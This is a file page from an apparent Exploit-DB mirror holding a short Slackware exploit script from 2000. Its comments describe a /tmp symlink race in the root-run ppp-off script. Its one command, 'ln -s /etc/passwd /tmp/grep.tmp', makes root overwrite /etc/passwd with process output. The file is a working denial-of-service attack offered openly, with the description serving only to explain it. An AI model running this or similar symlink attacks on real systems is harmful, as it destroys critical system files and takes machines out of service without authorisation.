exploit-db-mirror/exploits/linux/dos/185.sh
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

14 lines
No EOL
482 B
Bash
Executable file

#!/bin/sh
#
# In SlackWare Linux the script /usr/bin/ppp-off writes the
# output of 'ps x' to /tmp/grep.tmp. Since root is the user
# that runs ppp-off, a non-privileged user could create a
# link from /tmp/grep.tmp to any file(ie: /etc/issue), thus
# when root runs the ppp-off script, the output of 'ps x'
# would be put in the linked file.
# sinfony
ln -s /etc/passwd /tmp/grep.tmp
# milw0rm.com [2000-11-17]